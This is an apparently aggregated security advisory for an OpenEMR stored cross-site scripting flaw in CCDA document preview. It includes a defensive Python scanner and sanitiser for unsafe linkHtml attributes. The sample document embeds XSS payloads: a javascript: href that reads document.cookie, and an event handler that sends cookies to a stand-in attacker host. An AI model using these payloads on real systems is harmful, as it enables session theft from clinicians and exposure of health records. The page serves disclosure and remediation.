
OpenEMR CVE-2026-33932

HIGH
Cross-site Scripting (XSS) (CWE-79)
2026-03-26 security-advisories@github.com
7.6
CVSS 3.1 · GitHub Advisory

Severity by source

GitHub Advisory PRIMARY
7.6 HIGH
AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS Vector (GitHub Advisory)

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: Required
Scope: Changed
Confidentiality: High
Integrity: Low
Availability: None

Lifecycle Timeline

Analysis Generated: Mar 26, 2026 - 00:22 (vuln.today)
CVE Published: Mar 26, 2026 - 00:16 (nvd)

Description (GitHub Advisory)

OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0.3, a stored cross-site scripting vulnerability in the CCDA document preview allows an attacker who can upload or send a CCDA document to execute arbitrary JavaScript in a clinician's browser session when the document is previewed. The XSL stylesheet sanitizes attributes for all other narrative elements but not for linkHtml, allowing href="javascript:..." and event handler attributes to pass through unchanged. Version 8.0.0.3 patches the issue.
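The gap the description identifies is an attribute filter that covers the other narrative elements but skips linkHtml. The following Python is an added illustration written for this page, not OpenEMR's XSL stylesheet and not its 8.0.0.3 patch: it parses a constructed CCDA fragment, reports every linkHtml attribute that carries a javascript: (or other non-http/https/mailto) href or an on* event handler, and produces a neutralised copy in which the link text survives but the payload does not. The attribute allowlist, the accepted URL schemes and the sample document are this example's own assumptions. Pointed at CCDA files already stored by an instance that ran a vulnerable version, the scan function answers the question an incident responder asks after the upgrade: did a payload of this shape land before the patch?

```python
"""Find and neutralise unsafe linkHtml attributes in a CDA/CCDA narrative block.

Added illustration for this advisory; not OpenEMR code and not its 8.0.0.3 patch.
The attribute allowlist and accepted URL schemes below are this example's choices.
"""
import re
import xml.etree.ElementTree as ET

CDA_NS = "urn:hl7-org:v3"
LINKHTML = "{%s}linkHtml" % CDA_NS
ET.register_namespace("", CDA_NS)  # keep the default namespace on re-serialisation

# Assumed allowlist: the attributes a narrative linkHtml may keep.
ALLOWED_ATTRS = {"href", "name", "rel", "title", "ID"}
# Assumed allowlist: href schemes that cannot run script in the previewing browser.
SAFE_SCHEMES = {"http", "https", "mailto"}

_SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.\-]*):")

# Constructed sample: one benign link plus the two payload shapes the advisory
# describes (a javascript: href, here with an embedded tab, and an event handler).
SAMPLE_CCDA = """<ClinicalDocument xmlns="urn:hl7-org:v3">
  <component><structuredBody><component><section>
    <title>Results</title>
    <text>
      <paragraph>Lab report: <linkHtml href="https://lab.example/report/42">PDF</linkHtml></paragraph>
      <paragraph><linkHtml href="java&#9;script:alert(document.cookie)">Click for details</linkHtml></paragraph>
      <paragraph><linkHtml href="https://example.invalid/notes"
          onmouseover="fetch('https://evil.example/?c='+document.cookie)">Notes</linkHtml></paragraph>
    </text>
  </section></component></structuredBody></component>
</ClinicalDocument>
"""


def is_safe_href(href: str) -> bool:
    """True if href is relative, a fragment, or uses one of SAFE_SCHEMES.

    Browsers drop ASCII control characters and whitespace inside the scheme and
    compare it case-insensitively, so "java\\tscript:" and "JavaScript:" are
    normalised before the check rather than trusted as written.
    """
    normalised = re.sub(r"[\x00-\x20]", "", href).lower()
    match = _SCHEME_RE.match(normalised)
    if match is None:
        return True  # no scheme: relative URL or "#fragment"
    return match.group(1) in SAFE_SCHEMES


def _classify(attr: str, value: str):
    """Return the reason an attribute is unsafe, or None if it may stay."""
    if attr.lower().startswith("on"):
        return "event handler attribute"
    if attr not in ALLOWED_ATTRS:
        return "attribute not in allowlist"
    if attr == "href" and not is_safe_href(value):
        return "href with script-capable scheme"
    return None


def scan_linkhtml(xml_text: str) -> list:
    """List every unsafe attribute found on any linkHtml element in the document."""
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter(LINKHTML):
        for attr, value in el.attrib.items():
            reason = _classify(attr, value)
            if reason:
                findings.append({"attr": attr, "value": value, "reason": reason})
    return findings


def sanitize_linkhtml(xml_text: str) -> str:
    """Return the document with unsafe linkHtml attributes removed or neutralised.

    Link text is preserved; a script-capable href is replaced by "#" so the
    anchor stays visible but inert, and every other offending attribute is dropped.
    """
    root = ET.fromstring(xml_text)
    for el in root.iter(LINKHTML):
        for attr in list(el.attrib):
            if _classify(attr, el.attrib[attr]) is None:
                continue
            if attr == "href":
                el.attrib[attr] = "#"
            else:
                del el.attrib[attr]
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    for f in scan_linkhtml(SAMPLE_CCDA):
        print("UNSAFE %s=%r (%s)" % (f["attr"], f["value"], f["reason"]))
    print(sanitize_linkhtml(SAMPLE_CCDA))
```

Two details carry the weight here. The scheme check normalises away control characters and case before matching, because a literal comparison against "javascript:" misses the tab-split and mixed-case variants browsers still execute. And the filter is an allowlist in both directions (attribute names and schemes), so an unknown attribute or a data: or vbscript: URL is rejected without needing to be named in advance.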

Analysis (AI)

A stored cross-site scripting (XSS) vulnerability exists in OpenEMR's CCDA document preview functionality that allows authenticated attackers to execute arbitrary JavaScript in clinician browser sessions. OpenEMR versions prior to 8.0.0.3 are affected. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Access: Attacker uploads or sends a malicious CCDA document
Delivery: XSL stylesheet fails to sanitize the attributes of the linkHtml element
Exploit: JavaScript payload embedded in an href="javascript:..." or event handler attribute
Execution: Clinician previews the document in the browser
Impact: Arbitrary JavaScript executes in the clinician's session

Vulnerability Assessment (AI)

Exploitation: Requires OpenEMR prior to version 8.0.0.3. …
Risk Assessment: The CVSS score of 7.6 (High) reflects a network-based attack requiring low privileges and user interaction, with changed scope, resulting in high confidentiality impact and low integrity impact. …
Exploit Scenario: An attacker with low-privileged access to an OpenEMR instance (such as a patient portal account or compromised external provider credentials) crafts a malicious CCDA document containing linkHtml elements with javascript: protocol URLs or event handler attributes such as onclick. The attacker uploads this document through the patient portal or sends it via a health information exchange integration. …
Remediation: Upgrade OpenEMR to version 8.0.0.3 or later, which contains the patch that properly sanitizes linkHtml attributes in CCDA documents. …

Recommended Action (AI)

Within 24 hours: Disable CCDA document preview functionality if operationally feasible, or restrict access to trusted users only. …



CVE-2026-33932 vulnerability details – vuln.today
